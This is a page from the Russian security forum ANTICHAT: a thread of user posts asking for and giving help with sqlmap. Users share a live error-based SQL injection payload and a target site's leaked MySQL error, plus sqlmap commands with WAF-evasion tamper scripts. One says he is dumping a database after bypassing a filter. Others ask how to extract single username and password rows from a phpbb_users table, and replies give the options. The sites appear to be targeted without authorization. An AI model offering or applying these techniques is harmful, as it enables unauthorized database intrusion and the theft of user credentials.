HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #931  
Старый 27.09.2019, 19:44
sosidzh24
Новичок
Регистрация: 10.04.2019
Сообщений: 14
Провел на форуме:
5258

Репутация: 0
По умолчанию

сканер определил уязвимую ссылку и базу данных, имеет вид plants/?sFilterProperties=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHA R(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10 5),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97 )))),1)-- 1&sPage=1&sPerPage=12 Но sqlmap отказывается брать этот сайт.Какую технику использовать чтобы направить его в нужное направление?
 
Ответить с цитированием

  #932  
Старый 28.09.2019, 16:42
NewbieOnHack
Новичок
Регистрация: 28.09.2019
Сообщений: 2
Провел на форуме:
517

Репутация: 0
По умолчанию

Всем привет форумчане, кто может обьяснить, что делает --no-cast? Заранее спасибо. И почему при нормализации в --hex не дает базу и сыпятся запросы(блочит ваф), а при --no-cast я спокойно получил базу и дамплю сейчас!)
 
Ответить с цитированием

  #933  
Старый 29.09.2019, 00:32
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от NewbieOnHack  

Всем привет форумчане, кто может обьяснить, что делает --no-cast? Заранее спасибо. И почему при нормализации в --hex не дает базу и сыпятся запросы(блочит ваф), а при --no-cast я спокойно получил базу и дамплю сейчас!)
https://github.com/sqlmapproject/sqlmap/wiki/Usage

Turn off payload casting mechanism

Switch: --no-cast

When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of NULL values. That is being made to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).
 
Ответить с цитированием

  #934  
Старый 30.09.2019, 17:57
NewbieOnHack
Новичок
Регистрация: 28.09.2019
Сообщений: 2
Провел на форуме:
517

Репутация: 0
По умолчанию

Цитата:
Сообщение от RWD  

https://github.com/sqlmapproject/sqlmap/wiki/Usage
Turn off payload casting mechanism
Switch: --no-cast
When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of NULL values. That is being made to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).
Спасибо, но я не понял почему я обошел фильтр этим методом(при sql запросе в url строку получал 504, что означало, что коннект дропает фильтр)
 
Ответить с цитированием

  #935  
Старый 04.10.2019, 00:52
4sh0T
Новичок
Регистрация: 03.10.2019
Сообщений: 1
Провел на форуме:
335

Репутация: 0
По умолчанию

hello everyone, I'm sorry for not being able to speak Russian. I can translate if necessary but I thought I'd try it in english first.

I got a site which is vulnerable to SQL injection, however whatever I try it doesn't exploit the vulnerability. Also the WAF blocks some payloads, so I used Atlas(https://github.com/m4ll0k/Atlas) to identify the WAF, but it didn't manage to identify it, however it suggested me some tampers to use before the WAF blocked my IP. This is the response I get when I manually type in ' behind this site:

https://www.site.xx/xxxx/product.php?id=47' (I enter the ' myself)

"MySQL error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND p.products_status = 1 GROUP BY p.products_id' at line 1

SELECT * FROM products AS p LEFT JOIN products_description AS pd ON p.products_id=pd.products_id WHERE p.products_id = 47\\\' AND p.products_status = 1 GROUP BY p.products_id

TEP_DB_ERROR"


command used:

sqlmap -u https://www.site.xx/xxxx/product.php?id=47 --random-agent --level=5 --risk=3 --dbs --tamper=htmlencode,charunicodeencode,modsecurityver sioned,modsecurityzeroversioned,multiplespaces

Anyone knows how I could exploit?
 
Ответить с цитированием

  #936  
Старый 04.10.2019, 04:39
sosidzh24
Новичок
Регистрация: 10.04.2019
Сообщений: 14
Провел на форуме:
5258

Репутация: 0
По умолчанию

Цитата:
Сообщение от man474019  

and what you used ?
--level 5 --risk 3 -v 3 --random-agent
 
Ответить с цитированием

  #937  
Старый 04.10.2019, 16:33
sosidzh24
Новичок
Регистрация: 10.04.2019
Сообщений: 14
Провел на форуме:
5258

Репутация: 0
По умолчанию

Цитата:
Сообщение от man474019  

what sqlmap's result ?
all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

There are no errors in payloads
 
Ответить с цитированием

  #938  
Старый 06.10.2019, 11:42
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593

Репутация: 0
По умолчанию

Как правильно построить запрос к базе данных через sqlmap, если мне нужна только одна запись?

Запрос типа

Цитата:
Сообщение от None  
-T phpbb_users -C username,user_password --tamper=between --dump
Дампит все 100500 строк, но мне нужна одно значения логина-пароля, предположим, из 666 записи и не больше.

Как её правильно построить?
 
Ответить с цитированием

  #939  
Старый 06.10.2019, 11:45
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Muracha  

Как правильно построить запрос к базе данных через sqlmap, если мне нужна только одна запись?
Запрос типа
Дампит все 100500 строк, но мне нужна одно значения логина-пароля, предположим, из 666 записи и не больше.
Как её правильно построить?
--start=666 --stop=667 ну или через --where="email='asd@gmail.com'", --where="id IN (1,3)",что то типо такого
 
Ответить с цитированием

  #940  
Старый 08.10.2019, 19:09
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Я вас категорически приветствую. Вопрос, есть ли возможность настроить мап для автоматического дампа с конца базы, а не с начала. Типа start=1000 stop=1. Приходится дампить построчно, например 900-1000, 800-900, 700-800 etc, что не очень удобно. Возможно где то в settings.py либо скриптах подправить,либо какая то надстройка существует или костылями проставить какие то специфические параметры выборки в where по id при сливе, чтобы считывались данные с конца таблицы, при дампе по порядку мапом.. Подскажите, если кто озадачивался таким вопросом, периодически возникает данная необходимость...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.